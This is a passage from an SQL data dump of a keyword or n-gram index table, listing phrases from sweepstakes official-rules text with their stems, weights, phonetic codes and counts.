or',0,1,1.2,'A536',2,'en'),(25504,'and or court','and or court',0,1,1.4,'A536263',1,'en'),(25505,'and or death','and or death',0,1,1.4,'A5363',1,'en'),(25506,'and or modify','and or modify',0,1,1.4333,'A536531',1,'en'),(25507,'and or promotion','and or promotion',0,1,1.5333,'A53616535',1,'en'),(25508,'and or publish','and or publish',0,1,1.4667,'A536142',1,'en'),(25509,'and or select','and or select',0,1,1.4333,'A5362423',1,'en'),(25510,'and or statements','and or statements',0,1,1.5667,'A53623532',1,'en'),(25511,'and or terminate','and or terminate',0,1,1.5333,'A5363653',1,'en'),(25512,'and or unused','and or unused',0,1,1.4333,'A536523',1,'en'),(25513,'and or use','and or use',0,1,1.3333,'A5362',1,'en'),(25514,'and possessions','and possessions',0,1,1.5,'A531252',1,'en'),(25515,'and possessions and','and possessions and',0,1,1.6333,'A53125253',1,'en'),(25516,'and provincial','and provincial',0,1,1.4667,'A53161524',1,'en'),(25517,'and provincial or','and provincial or',0,1,1.5667,'A531615246',1,'en'),(25518,'and questions','and questions',0,1,1.4333,'A532352',1,'en'),(25519,'and questions concerning','and questions concerning',0,1,1.8,'A53235252652',1,'en'),(25520,'and real','and real',0,1,1.2667,'A5364',1,'en'),(25521,'and real estate','and real estate',0,1,1.5,'A536423',1,'en'),(25522,'and sisters','and sisters',0,1,1.3667,'A532362',1,'en'),(25523,'and sisters or','and sisters or',0,1,1.4667,'A5323626',1,'en'),(25524,'and successor','and successor',0,1,1.4333,'A5326',1,'en'),(25525,'and successor companies','and successor companies',0,1,1.7667,'A532625152',1,'en'),(25526,'and supplement','and supplement',0,1,1.4667,'A5321453',1,'en'),(25527,'and supplement delivery','and supplement delivery',0,1,1.7667,'A5321453416',1,'en'),(25528,'and the behaviours','and the behaviours',0,1,1.6,'A53162',1,'en'),(25529,'and the immediate','and the immediate',0,1,1.5667,'A5353',1,'en'),(25530,'and their','and their',0,1,1.3,'A536',1,'en'),(25531,'and their use','and their use',0,1,1.4333,'A5362',1,'en'),(25532,'and waive','and waive',0,1,1.3,'A531',1,'en'),(25533,'and waive any','and waive any',0,1,1.4333,'A5315',1,'en'),(25534,'and will','and will',0,1,1.2667,'A534',2,'en'),(25535,'and will not','and will not',0,1,1.4,'A53453',1,'en'),(25536,'and winner','and winner',0,1,1.3333,'A5356',1,'en'),(25537,'and winner agree','and winner agree',0,1,1.5333,'A535626',1,'en'),(25538,'and winners','and winners',0,1,1.3667,'A53562',1,'en'),(25539,'and winners acknowledge','and winners acknowledge',0,1,1.7667,'A535625432',1,'en'),(25540,'and won\'t','and won',0,1,1.3,'A5353',1,'en'),(25541,'and won\'t be','and won be',0,1,1.4,'A53531',1,'en'),(25542,'angeles','angel',0,0,0.4667,'A5242',3,'en'),(25543,'angeles 10017','angel 10017',0,1,1.4333,'A5242',1,'en'),(25544,'angeles 10017 3204','angel 10017 3204',0,1,1.6,'A5242',1,'en'),(25545,'announcements','announc',0,0,0.8667,'A52532',1,'en'),(25546,'announcements that','announc that',0,1,1.6,'A525323',1,'en'),(25547,'announcements that are','announc that are',0,1,1.7333,'A5253236',1,'en'),(25548,'another winner','anoth winner',0,1,1.4667,'A53656',1,'en'),(25549,'another winner may','anoth winner may',0,1,1.6,'A536565',1,'en'),(25550,'answer','answer',0,0,0.4,'A526',2,'en'),(25551,'answer unaided','answer unaided',0,1,1.4667,'A52653',1,'en'),(25552,'answer unaided a','answer unaided a',0,1,1.5333,'A52653',1,'en'),(25553,'answerable','answer',0,0,0.6667,'A52614',1,'en'),(25554,'answerable or','answer or',0,1,1.4333,'A526146',1,'en'),(25555,'answerable or liable','answer or liable',0,1,1.6667,'A526146414',1,'en'),(25556,'any and','ani and',0,1,1.2333,'A530',1,'en'),(25557,'any and all','ani and all',0,1,1.3667,'A534',1,'en'),(25558,'any choice','ani choice',0,1,1.3333,'A520',1,'en'),(25559,'any choice of','ani choice of',0,1,1.4333,'A521',1,'en'),(25560,'any claim','ani claim',0,1,1.3,'A5245',1,'en'),(25561,'any claim of','ani claim of',0,1,1.4,'A52451',1,'en'),(25562,'any claims','ani claims',0,1,1.3333,'A52452',1,'en'),(25563,'any claims or','ani claims or',0,1,1.4333,'A524526',1,'en'),(25564,'any client','ani client',0,1,1.3333,'A52453',1,'en'),(25565,'any client his','ani client his',0,1,1.4667,'A524532',1,'en'),(25566,'any depictions','ani depictions',0,1,1.4667,'A5312352',1,'en'),(25567,'any depictions of','ani depictions of',0,1,1.5667,'A53123521',1,'en'),(25568,'any destruction','ani destruction',0,1,1.5,'A53236235',1,'en'),(25569,'any destruction injuries','ani destruction injuries',0,1,1.8,'A53236235262',1,'en'),(25570,'any dispute','ani dispute',0,1,1.3667,'A53213',1,'en'),(25571,'any dispute relating','ani dispute relating',0,1,1.6667,'A5321364352',1,'en'),(25572,'any forms','ani forms',0,1,1.3,'A51652',1,'en'),(25573,'any forms of','ani forms of',0,1,1.4,'A516521',1,'en'),(25574,'any inability','ani inability',0,1,1.4333,'A5143',1,'en'),(25575,'any inability of','ani inability of',0,1,1.5333,'A51431',1,'en'),(25576,'any injury','ani injury',0,1,1.3333,'A526',1,'en'),(25577,'any injury or','ani injury or',0,1,1.4333,'A526',1,'en'),(25578,'any jurisdiction','ani jurisdiction',0,1,1.5333,'A52623235',1,'en'),(25579,'any jurisdiction other','ani jurisdiction other',0,1,1.7333,'A5262323536',1,'en'),(25580,'any kind','ani kind',0,1,1.2667,'A5253',1,'en'),(25581,'any kind caused','ani kind caused',0,1,1.5,'A525323',1,'en'),(25582,'any kind is','ani kind is',0,1,1.3667,'A52532',1,'en'),(25583,'any liability','ani liability',0,1,1.4333,'A54143',1,'en'),(25584,'any liability concerning','ani liability concerning',0,1,1.8,'A54143252652',1,'en'),(25585,'any liability to','ani liability to',0,1,1.5333,'A54143',1,'en'),(25586,'any lost','ani lost',0,1,1.2667,'A5423',1,'en'),(25587,'any lost or','ani lost or',0,1,1.3667,'A54236',1,'en'),(25588,'any manner','ani manner',0,1,1.3333,'A560',1,'en'),(25589,'any manner answerable','ani manner answerable',0,1,1.7,'A5652614',1,'en'),(25590,'any mistakes','ani mistakes',0,1,1.4,'A5232',1,'en'),(25591,'any mistakes or','ani mistakes or',0,1,1.5,'A52326',1,'en'),(25592,'any obligation','ani obligation',0,1,1.4667,'A514235',1,'en'),(25593,'any obligation or','ani obligation or',0,1,1.5667,'A5142356',1,'en'),(25594,'any of','ani of',0,1,1.2,'A510',1,'en'),(25595,'any of the','ani of the',0,1,1.3333,'A513',1,'en'),(25596,'any organizations','ani organizations',0,1,1.5667,'A56252352',1,'en'),(25597,'any organizations regarding','ani organizations regarding',0,1,1.9,'A56252352626352',1,'en'),(25598,'any other certification','ani other certification',0,1,1.7667,'A5362631235',1,'en'),(25599,'any other forms','ani other forms',0,1,1.5,'A5361652',1,'en'),(25600,'any other person','ani other person',0,1,1.5333,'A5361625',1,'en'),(25601,'any part','ani part',0,1,1.2667,'A5163',1,'en'),(25602,'any part of','ani part of',0,1,1.3667,'A51631',1,'en'),(25603,'any person','ani person',0,1,1.3333,'A51625',1,'en'),(25604,'any person except','ani person except',0,1,1.5667,'A51625213',1,'en'),(25605,'any portion','ani portion',0,1,1.3667,'A51635',1,'en'),(25606,'any portion of','ani portion of',0,1,1.4667,'A516351',1,'en'),(25607,'any prize','ani prize',0,1,1.3,'A5162',1,'en'),(25608,'any prize and','ani prize and',0,1,1.4333,'A516253',1,'en'),(25609,'any prize at','ani prize at',0,1,1.4,'A51623',1,'en'),(25610,'any prize integrating','ani prize integrating',0,1,1.7,'A51625326352',1,'en'),(25611,'any prize or','ani prize or',0,1,1.4,'A51626',1,'en'),(25612,'any prize to','ani prize to',0,1,1.4,'A51623',1,'en'),(25613,'any promotion','ani promotion',0,1,1.4333,'A516535',1,'en'),(25614,'any promotion or','ani promotion or',0,1,1.5333,'A5165356',1,'en'),(25615,'any purposes','ani purposes',0,1,1.4,'A51612',1,'en'),(25616,'any purposes such','ani purposes such',0,1,1.5667,'A51612',1,'en'),(25617,'any recognizable','ani recognizable',0,1,1.5333,'A5625214',1,'en'),(25618,'any recognizable way','ani recognizable way',0,1,1.6667,'A5625214',1,'en'),(25619,'any resulting','ani resulting',0,1,1.4333,'A5624352',1,'en'),(25620,'any resulting fees','ani resulting fees',0,1,1.6,'A562435212',1,'en'),(25621,'any robotic','ani robotic',0,1,1.3667,'A56132',1,'en'),(25622,'any robotic or','ani robotic or',0,1,1.4667,'A561326',1,'en'),(25623,'any sweepstakes','ani sweepstakes',0,1,1.5,'A521232',1,'en'),(25624,'any sweepstakes related','ani sweepstakes related',0,1,1.7667,'A521232643',1,'en'),(25625,'any third','ani third',0,1,1.3,'A5363',1,'en'),(25626,'any third parties','ani third parties',0,1,1.5667,'A53631632',1,'en'),(25627,'any third party','ani third party',0,1,1.5,'A5363163',1,'en'),(25628,'any those','ani those',0,1,1.3,'A532',1,'en'),(25629,'any those who','ani those who',0,1,1.4333,'A532',1,'en'),(25630,'any warranty','ani warranty',0,1,1.4,'A5653',1,'en'),(25631,'any warranty representations','ani warranty representations',0,1,1.9333,'A565361625352',1,'en'),(25632,'any way','ani way',0,1,1.2333,'A500',1,'en'),(25633,'any way with','ani way with',0,1,1.4,'A530',1,'en'),(25634,'any web','ani web',0,1,1.2333,'A510',1,'en'),(25635,'any web sites','ani web sites',0,1,1.4333,'A51232',1,'en'),(25636,'anywhere they','anywher they',0,1,1.4333,'A563',1,'en'),(25637,'anywhere they are','anywher they are',0,1,1.5667,'A5636',1,'en'),(25638,'appears','appear',0,0,0.4667,'A162',2,'en'),(25639,'appears to','appear to',0,1,1.3333,'A1623',1,'en'),(25640,'appears to be','appear to be',0,1,1.4333,'A16231',1,'en'),(25641,'apple nyc','appl nyc',0,1,1.3,'A1452',1,'en'),(25642,'apple nyc 10017.you','appl nyc 10017.you',0,1,1.6333,'A1452',1,'en'),(25643,'applicable','applic',0,0,0.6667,'A14214',1,'en'),(25644,'applicable terms','applic terms',0,1,1.5333,'A142143652',1,'en'),(25645,'applicable terms any','applic terms any',0,1,1.6667,'A1421436525',1,'en'),(25646,'apply','appli',0,0,0.3333,'A140',1,'en'),(25647,'apply to','appli to',0,1,1.2667,'A143',1,'en'),(25648,'apply to the','appli to the',0,1,1.4,'A143',1,'en'),(25649,'appropriate','appropri',0,0,0.7333,'A16163',2,'en'),(25650,'appropriate in','appropri in',0,1,1.4667,'A161635',1,'en'),(25651,'appropriate in its','appropri in its',0,1,1.6,'A16163532',1,'en'),(25652,'appropriate portion','appropri portion',0,1,1.6333,'A161631635',1,'en'),(25653,'appropriate portion of','appropri portion of',0,1,1.7333,'A1616316351',1,'en'),(25654,'approval to','approv to',0,1,1.3667,'A16143',1,'en'),(25655,'approval to the','approv to the',0,1,1.5,'A16143',1,'en'),(25656,'are 18','ar 18',0,1,1.2,'A600',1,'en'),(25657,'are 18 yrs','ar 18 yrs',0,1,1.3333,'A620',1,'en'),(25658,'are accepted','ar accepted',0,1,1.4,'A6213',1,'en'),(25659,'are accepted rodale','ar accepted rodale',0,1,1.6333,'A6213634',1,'en'),(25660,'are blessed','ar blessed',0,1,1.3667,'A61423',1,'en'),(25661,'are blessed with','ar blessed with',0,1,1.5333,'A61423',1,'en'),(25662,'are final','ar final',0,1,1.3,'A6154',1,'en'),(25663,'are final and','ar final and',0,1,1.4333,'A615453',1,'en'),(25664,'are for','ar for',0,1,1.2333,'A616',1,'en'),(25665,'are for illustrative','ar for illustrative',0,1,1.6667,'A616423631',1,'en'),(25666,'are in any','ar in any',0,1,1.3333,'A650',1,'en'),(25667,'are lost','ar lost',0,1,1.2667,'A6423',1,'en'),(25668,'are lost later','ar lost later',0,1,1.4667,'A6423436',1,'en'),(25669,'are not eligible','ar not eligible',0,1,1.5333,'A6534214',1,'en'),(25670,'are solely','ar solely',0,1,1.3333,'A624',1,'en'),(25671,'are solely the','ar solely the',0,1,1.4667,'A6243',1,'en'),(25672,'are the','ar the',0,1,1.2333,'A630',2,'en'),(25673,'are the sole','ar the sole',0,1,1.4,'A6324',1,'en'),(25674,'areas','area',0,0,0.3333,'A620',1,'en'),(25675,'areas and','area and',0,1,1.3,'A6253',1,'en'),(25676,'areas and possessions','area and possessions',0,1,1.7,'A62531252',1,'en'),(25677,'areas or','area or',0,1,1.2667,'A626',1,'en'),(25678,'areas or possessions','area or possessions',0,1,1.6667,'A6261252',1,'en'),(25679,'arising','aris',0,0,0.4667,'A6252',1,'en'),(25680,'arising out','aris out',0,1,1.3667,'A62523',1,'en'),(25681,'arising out of','aris out of',0,1,1.4667,'A625231',1,'en'),(25682,'arv','arv',0,0,0.2,'A610',1,'en'),(25683,'arv of','arv of',0,1,1.2,'A610',1,'en'),(25684,'arv of the','arv of the',0,1,1.3333,'A613',1,'en'),(25685,'as an affiliate','as an affiliate',0,1,1.5,'A25143',1,'en'),(25686,'as an example','as an example',0,1,1.4333,'A252514',2,'en'),(25687,'as but','as but',0,1,1.2,'A213',1,'en'),(25688,'as but not','as but not',0,1,1.3333,'A21353',1,'en'),(25689,'as of','as of',0,1,1.1667,'A210',1,'en'),(25690,'as of the','as of the',0,1,1.3,'A213',1,'en'),(25691,'as provided','as provided',0,1,1.3667,'A21613',1,'en'),(25692,'as provided for','as provided for',0,1,1.5,'A2161316',1,'en'),(25693,'as to','as to',0,1,1.1667,'A230',1,'en'),(25694,'as to redeem','as to redeem',0,1,1.4,'A23635',1,'en'),(25695,'as told','as told',0,1,1.2333,'A2343',1,'en'),(25696,'as told in','as told in',0,1,1.3333,'A23435',1,'en'),(25697,'as undeliverable','as undeliverable',0,1,1.5333,'A25341614',1,'en'),(25698,'as undeliverable for','as undeliverable for',0,1,1.6667,'A2534161416',1,'en'),(25699,'assets damage','asset damage',0,1,1.4333,'A232352',1,'en'),(25700,'assets damage compensation','asset damage compensation',0,1,1.8667,'A232352515235',1,'en'),(25701,'assets images','asset images',0,1,1.4333,'A23252',1,'en'),(25702,'assets images or','asset images or',0,1,1.5333,'A232526',1,'en'),(25703,'assigns','assign',0,0,0.4667,'A252',1,'en'),(25704,'assigns persons','assign persons',0,1,1.5,'A25216252',1,'en'),(25705,'assigns persons officers','assign persons officers',0,1,1.8,'A252162521262',1,'en'),(25706,'assigns sales','assign sales',0,1,1.4333,'A25242',1,'en'),(25707,'assigns sales agents','assign sales agents',0,1,1.6667,'A25242532',1,'en'),(25708,'assigns workforce','assign workforce',0,1,1.5667,'A25262162',1,'en'),(25709,'assigns workforce officers','assign workforce officers',0,1,1.8667,'A252621621262',1,'en'),(25710,'associates','associ',0,0,0.6667,'A232',1,'en'),(25711,'associates allies','associ allies',0,1,1.5667,'A23242',1,'en'),(25712,'associates allies specialists','associ allies specialists',0,1,1.9667,'A23242124232',1,'en'),(25713,'association','associ',0,0,0.7333,'A235',1,'en'),(25714,'association with','associ with',0,1,1.5333,'A2353',1,'en'),(25715,'association with this','associ with this',0,1,1.7,'A23532',1,'en'),(25716,'assume','assum',0,0,0.4,'A250',1,'en'),(25717,'assume no','assum no',0,1,1.3,'A250',1,'en'),(25718,'assume no task','assum no task',0,1,1.4667,'A2532',1,'en'),(25719,'at issue','at issue',0,1,1.2667,'A320',1,'en'),(25720,'at issue and','at issue and',0,1,1.4,'A3253',1,'en'),(25721,'at least','at least',0,1,1.2667,'A3423',1,'en'),(25722,'at least several','at least several',0,1,1.5333,'A34232164',1,'en'),(25723,'at or','at or',0,1,1.1667,'A360',1,'en'),(25724,'at or above','at or above',0,1,1.3667,'A361',1,'en'),(25725,'at sponsor\'s','at sponsor',0,1,1.4,'A3215262',1,'en'),(25726,'at sponsor\'s sole','at sponsor sole',0,1,1.5667,'A32152624',1,'en'),(25727,'at the e','at the e',0,1,1.2667,'A300',1,'en'),(25728,'at thelizabeth','at thelizabeth',0,1,1.4667,'A34213',2,'en'),(25729,'at thelizabeth potential','at thelizabeth potential',0,1,1.8,'A3421313534',1,'en'),(25730,'attempting','attempt',0,0,0.6667,'A351352',1,'en'),(25731,'attempting to','attempt to',0,1,1.4333,'A3513523',1,'en'),(25732,'attempting to enter','attempt to enter',0,1,1.6333,'A3513523536',1,'en'),(25733,'attracting','attract',0,0,0.6667,'A362352',1,'en'),(25734,'attracting odds','attract odds',0,1,1.5,'A36235232',1,'en'),(25735,'attracting odds of','attract odds of',0,1,1.6,'A362352321',1,'en'),(25736,'authority','author',0,0,0.6,'A363',1,'en'),(25737,'authority to','author to',0,1,1.4,'A363',1,'en'),(25738,'authority to void','author to void',0,1,1.5667,'A36313',1,'en'),(25739,'automated devices','autom devices',0,1,1.5667,'A35312',1,'en'),(25740,'automated devices to','autom devices to',0,1,1.6667,'A353123',1,'en'),(25741,'ave','av',0,0,0.2,'A100',2,'en'),(25742,'ave 10th','av 10th',0,1,1.2667,'A130',1,'en'),(25743,'ave 10th bottom','av 10th bottom',0,1,1.5,'A13135',1,'en'),(25744,'ave 10th hardwood','av 10th hardwood',0,1,1.5667,'A1363',1,'en'),(25745,'award','award',0,0,0.3333,'A630',1,'en'),(25746,'award any','award any',0,1,1.3,'A635',1,'en'),(25747,'award any prize','award any prize',0,1,1.5,'A635162',1,'en'),(25748,'award the','award the',0,1,1.3,'A630',1,'en'),(25749,'award the reward','award the reward',0,1,1.5333,'A6363',1,'en'),(25750,'awarded','award',0,0,0.4667,'A630',1,'en'),(25751,'awarded due','award due',0,1,1.3667,'A630',1,'en'),(25752,'awarded due to','award due to',0,1,1.4667,'A630',1,'en'),(25753,'awarded within','award within',0,1,1.4667,'A635',1,'en'),(25754,'awarded within 1','award within 1',0,1,1.5333,'A635',1,'en'),(25755,'awarding','award',0,0,0.5333,'A6352',1,'en'),(25756,'awarding acknowledgement','award acknowledgement',0,1,1.8,'A6352543253',1,'en'),(25757,'awarding acknowledgement thing','award acknowledgement thing',0,1,2,'A635254325352',1,'en'),(25758,'awarding the','award the',0,1,1.4,'A63523',1,'en'),(25759,'awarding the prize','award the prize',0,1,1.6,'A63523162',1,'en'),(25760,'awards','award',0,0,0.4,'A632',2,'en'),(25761,'awards the','award the',0,1,1.3333,'A6323',1,'en'),(25762,'awards the rough','award the rough',0,1,1.5333,'A632362',1,'en'),(25763,'back on','back on',0,1,1.2333,'B250',1,'en'),(25764,'back on sponsor','back on sponsor',0,1,1.5,'B2521526',1,'en'),(25765,'back to','back to',0,1,1.2333,'B230',2,'en'),(25766,'back to sponsor','back to sponsor',0,1,1.5,'B2321526',1,'en'),(25767,'ban','ban',0,0,0.2,'B500',3,'en'),(25768,'ban pay','ban pay',0,1,1.2333,'B510',1,'en'),(25769,'ban pay plans','ban pay plans',0,1,1.4333,'B51452',1,'en'),(25770,'ban reparation','ban reparation',0,1,1.4667,'B561635',1,'en'),(25771,'ban reparation uncover','ban reparation uncover',0,1,1.7333,'B561635216',1,'en'),(25772,'banned','ban',0,0,0.4,'B530',1,'en'),(25773,'banned by','ban by',0,1,1.3,'B531',1,'en'),(25774,'banned by law','ban by law',0,1,1.4333,'B5314',1,'en'),(25775,'base','base',0,0,0.2667,'B200',1,'en'),(25776,'base big','base big',0,1,1.2667,'B212',1,'en'),(25777,'base big apple','base big apple',0,1,1.4667,'B21214',1,'en'),(25778,'based on publicity','base on publicity',0,1,1.6,'B2351423',1,'en'),(25779,'be a minor','be a minor',0,1,1.3333,'B560',1,'en'),(25780,'be able','be able',0,1,1.2333,'B400',2,'en'),(25781,'be able to','be able to',0,1,1.3333,'B430',2,'en'),(25782,'be acknowledged','be acknowledged',0,1,1.5,'B254323',1,'en'),(25783,'be acknowledged or','be acknowledged or',0,1,1.6,'B2543236',1,'en'),(25784,'be an','be an',0,1,1.1667,'B500',2,'en'),(25785,'be an actual','be an actual',0,1,1.4,'B5234',1,'en'),(25786,'be awarded','be awarded',0,1,1.3333,'B630',1,'en'),(25787,'be awarded due','be awarded due',0,1,1.4667,'B630',1,'en'),(25788,'be awarded within','be awarded within',0,1,1.5667,'B635',1,'en'),(25789,'be binding','be binding',0,1,1.3333,'B5352',1,'en'),(25790,'be binding and','be binding and',0,1,1.4667,'B535253',1,'en'),(25791,'be bound','be bound',0,1,1.2667,'B530',1,'en'),(25792,'be bound by','be bound by',0,1,1.3667,'B531',1,'en'),(25793,'be brought','be brought',0,1,1.3333,'B623',1,'en'),(25794,'be considered','be considered',0,1,1.4333,'B252363',1,'en'),(25795,'be considered anywhere','be considered anywhere',0,1,1.7333,'B25236356',1,'en'),(25796,'be decided','be decided',0,1,1.3333,'B323',1,'en'),(25797,'be decided on','be decided on',0,1,1.4333,'B3235',1,'en'),(25798,'be disqualified','be disqualified',0,1,1.5,'B32413',1,'en'),(25799,'be disqualified from','be disqualified from',0,1,1.6667,'B32413165',1,'en'),(25800,'be disqualified plus','be disqualified plus',0,1,1.6667,'B32413142',1,'en'),(25801,'be forfeited','be forfeited',0,1,1.4,'B613',1,'en'),(25802,'be forfeited and','be forfeited and',0,1,1.5333,'B61353',1,'en'),(25803,'be given','be given',0,1,1.2667,'B215',1,'en'),(25804,'be given to','be given to',0,1,1.3667,'B2153',1,'en'),(25805,'be governed','be governed',0,1,1.3667,'B21653',1,'en'),(25806,'be governed by','be governed by',0,1,1.4667,'B216531',1,'en'),(25807,'be ineligible','be ineligible',0,1,1.4333,'B54214',1,'en'),(25808,'be ineligible to','be ineligible to',0,1,1.5333,'B542143',1,'en'),(25809,'be notified','be notified',0,1,1.3667,'B5313',1,'en'),(25810,'be notified by','be notified by',0,1,1.4667,'B53131',1,'en'),(25811,'be postmarked','be postmarked',0,1,1.4333,'B235623',1,'en'),(25812,'be postmarked no','be postmarked no',0,1,1.5333,'B2356235',1,'en'),(25813,'be provided','be provided',0,1,1.3667,'B613',1,'en'),(25814,'be provided to','be provided to',0,1,1.4667,'B613',1,'en'),(25815,'be reached','be reached',0,1,1.3333,'B623',1,'en'),(25816,'be reached for','be reached for',0,1,1.4667,'B62316',1,'en'),(25817,'be received','be received',0,1,1.3667,'B6213',1,'en'),(25818,'be received before','be received before',0,1,1.6,'B621316',1,'en'),(25819,'be selected','be selected',0,1,1.3667,'B2423',1,'en'),(25820,'be selected at','be selected at',0,1,1.4667,'B2423',1,'en'),(25821,'be sent an','be sent an',0,1,1.3333,'B2535',1,'en'),(25822,'be sharing','be sharing',0,1,1.3333,'B2652',1,'en'),(25823,'be sharing their','be sharing their',0,1,1.5333,'B265236',1,'en'),(25824,'be substituted','be substituted',0,1,1.4667,'B2123',1,'en'),(25825,'be substituted 6.marketing','be substituted 6.marketing',0,1,1.8667,'B2123562352',1,'en'),(25826,'become','becom',0,0,0.4,'B250',1,'en'),(25827,'become the','becom the',0,1,1.3333,'B253',1,'en'),(25828,'become the house','becom the house',0,1,1.5333,'B2532',1,'en'),(25829,'been exerted','been exerted',0,1,1.4,'B5263',1,'en'),(25830,'been exerted based','been exerted based',0,1,1.6,'B5263123',1,'en'),(25831,'been provided','been provided',0,1,1.4333,'B51613',1,'en'),(25832,'been provided to','been provided to',0,1,1.5333,'B51613',1,'en'),(25833,'before the end','befor the end',0,1,1.4667,'B6353',1,'en'),(25834,'behaviours','behaviour',0,0,0.6667,'B620',1,'en'),(25835,'behaviours of','behaviour of',0,1,1.4333,'B621',1,'en'),(25836,'behaviours of sponsor','behaviour of sponsor',0,1,1.7,'B62121526',1,'en'),(25837,'below to be','below to be',0,1,1.3667,'B431',1,'en'),(25838,'best quality','best quality',0,1,1.4,'B23243',1,'en'),(25839,'best quality state','best quality state',0,1,1.6,'B2324323',1,'en'),(25840,'beyond sponsor','beyond sponsor',0,1,1.4667,'B5321526',1,'en'),(25841,'beyond sponsor reasonable','beyond sponsor reasonable',0,1,1.8333,'B53215262514',1,'en'),(25842,'big apple','big apple',0,1,1.3,'B214',1,'en'),(25843,'big apple nyc','big apple nyc',0,1,1.4333,'B21452',1,'en'),(25844,'binding','bind',0,0,0.4667,'B5352',1,'en'),(25845,'binding and','bind and',0,1,1.3667,'B535253',1,'en'),(25846,'binding and final','bind and final',0,1,1.5667,'B535253154',1,'en'),(25847,'binding in','bind in',0,1,1.3333,'B53525',1,'en'),(25848,'binding in all','bind in all',0,1,1.4667,'B535254',1,'en'),(25849,'biographical','biograph',0,0,0.8,'B26124',1,'en'),(25850,'biographical data','biograph data',0,1,1.5667,'B261243',1,'en'),(25851,'biographical data entirely','biograph data entirely',0,1,1.8667,'B2612435364',1,'en'),(25852,'biographical facts','biograph facts',0,1,1.6,'B261241232',1,'en'),(25853,'biographical facts entirely','biograph facts entirely',0,1,1.9,'B2612412325364',1,'en'),(25854,'bit including','bit including',0,1,1.4333,'B3524352',1,'en'),(25855,'bit including without','bit including without',0,1,1.7,'B35243523',1,'en'),(25856,'blessed','bless',0,0,0.4667,'B423',1,'en'),(25857,'blessed with','bless with',0,1,1.4,'B423',1,'en'),(25858,'blessed with notarized','bless with notarized',0,1,1.7333,'B42353623',1,'en'),(25859,'body','bodi',0,0,0.2667,'B300',2,'en'),(25860,'body of','bodi of',0,1,1.2333,'B310',1,'en'),(25861,'body of your','bodi of your',0,1,1.4,'B316',1,'en'),(25862,'boss','boss',0,0,0.2667,'B200',1,'en'),(25863,'boss offer','boss offer',0,1,1.3333,'B216',1,'en'),(25864,'boss offer cell','boss offer cell',0,1,1.5,'B21624',1,'en'),(25865,'bottom nyc','bottom nyc',0,1,1.3333,'B352',1,'en'),(25866,'bottom nyc los','bottom nyc los',0,1,1.4667,'B35242',1,'en'),(25867,'bound','bound',0,0,0.3333,'B530',2,'en'),(25868,'bound by','bound by',0,1,1.2667,'B531',1,'en'),(25869,'bound by these','bound by these',0,1,1.4667,'B53132',1,'en'),(25870,'broker','broker',0,0,0.4,'B626',2,'en'),(25871,'broker employees','broker employees',0,1,1.5333,'B6265142',1,'en'),(25872,'broker employees successors','broker employees successors',0,1,1.9,'B626514262',1,'en'),(25873,'brokers successors','broker successors',0,1,1.6,'B626262',1,'en'),(25874,'brokers successors assigns','broker successors assigns',0,1,1.8667,'B62626252',1,'en'),(25875,'brothers','brother',0,0,0.5333,'B6362',1,'en'),(25876,'brothers and','brother and',0,1,1.4,'B636253',1,'en'),(25877,'brothers and sisters','brother and sisters',0,1,1.6667,'B6362532362',1,'en'),(25878,'brought','brought',0,0,0.4667,'B623',1,'en'),(25879,'burden','burden',0,0,0.4,'B635',1,'en'),(25880,'burden on','burden on',0,1,1.3,'B635',1,'en'),(25881,'burden on and','burden on and',0,1,1.4333,'B6353',1,'en'),(25882,'but not','but not',0,1,1.2333,'B353',1,'en'),(25883,'but not limited','but not limited',0,1,1.5,'B353453',1,'en'),(25884,'but not on','but not on',0,1,1.3333,'B3535',1,'en'),(25885,'but not restricted','but not restricted',0,1,1.6,'B353623623',1,'en'),(25886,'but not tied','but not tied',0,1,1.4,'B353',1,'en'),(25887,'by acknowledging','by acknowledging',0,1,1.5333,'B2543252',1,'en'),(25888,'by acknowledging the','by acknowledging the',0,1,1.6667,'B25432523',1,'en'),(25889,'by ad','by ad',0,1,1.1667,'B300',1,'en'),(25890,'by ad trade','by ad trade',0,1,1.3667,'B363',1,'en'),(25891,'by and','by and',0,1,1.2,'B530',1,'en'),(25892,'by and construed','by and construed',0,1,1.5333,'B53252363',1,'en'),(25893,'by any','by any',0,1,1.2,'B500',1,'en'),(25894,'by any part','by any part',0,1,1.3667,'B5163',1,'en'),(25895,'by any prize','by any prize',0,1,1.4,'B5162',1,'en'),(25896,'by any third','by any third',0,1,1.4,'B5363',1,'en'),(25897,'by awarding','by awarding',0,1,1.3667,'B6352',1,'en'),(25898,'by awarding acknowledgement','by awarding acknowledgement',0,1,1.9,'B6352543253',1,'en'),(25899,'by e','by e',0,1,1.1333,'B000',1,'en'),(25900,'by e mail','by e mail',0,1,1.3,'B540',1,'en'),(25901,'by engaging','by engaging',0,1,1.3667,'B5252',1,'en'),(25902,'by engaging in','by engaging in',0,1,1.4667,'B52525',1,'en'),(25903,'by entering','by entering',0,1,1.3667,'B53652',1,'en'),(25904,'by entering entrants','by entering entrants',0,1,1.6667,'B53652536532',1,'en'),(25905,'by entering the','by entering the',0,1,1.5,'B536523',1,'en'),(25906,'by following','by following',0,1,1.4,'B452',1,'en'),(25907,'by following opt','by following opt',0,1,1.5333,'B45213',1,'en'),(25908,'by full','by full',0,1,1.2333,'B400',1,'en'),(25909,'by full name','by full name',0,1,1.4,'B450',1,'en'),(25910,'by hand','by hand',0,1,1.2333,'B530',1,'en'),(25911,'by hand start','by hand start',0,1,1.4333,'B532363',1,'en'),(25912,'by hazards','by hazards',0,1,1.3333,'B2632',1,'en'),(25913,'by hazards winner','by hazards winner',0,1,1.5667,'B263256',1,'en'),(25914,'by law','by law',0,1,1.2,'B400',1,'en'),(25915,'by law also','by law also',0,1,1.3667,'B420',1,'en'),(25916,'by law and','by law and',0,1,1.3333,'B453',1,'en'),(25917,'by law areas','by law areas',0,1,1.4,'B462',1,'en'),(25918,'by law winner','by law winner',0,1,1.4333,'B456',1,'en'),(25919,'by mail','by mail',0,1,1.2333,'B540',1,'en'),(25920,'by mail any','by mail any',0,1,1.3667,'B545',1,'en'),(25921,'by making','by making',0,1,1.3,'B5252',1,'en'),(25922,'by making the','by making the',0,1,1.4333,'B52523',1,'en'),(25923,'by postal','by postal',0,1,1.3,'B234',1,'en'),(25924,'by postal mailing','by postal mailing',0,1,1.5667,'B2345452',1,'en'),(25925,'by sales','by sales',0,1,1.2667,'B242',1,'en'),(25926,'by sales place','by sales place',0,1,1.4667,'B242142',1,'en'),(25927,'by sponsor','by sponsor',0,1,1.3333,'B21526',1,'en'),(25928,'by sponsor sponsor','by sponsor sponsor',0,1,1.6,'B2152621526',1,'en'),(25929,'by sponsor will','by sponsor will',0,1,1.5,'B215264',1,'en'),(25930,'by the intended','by the 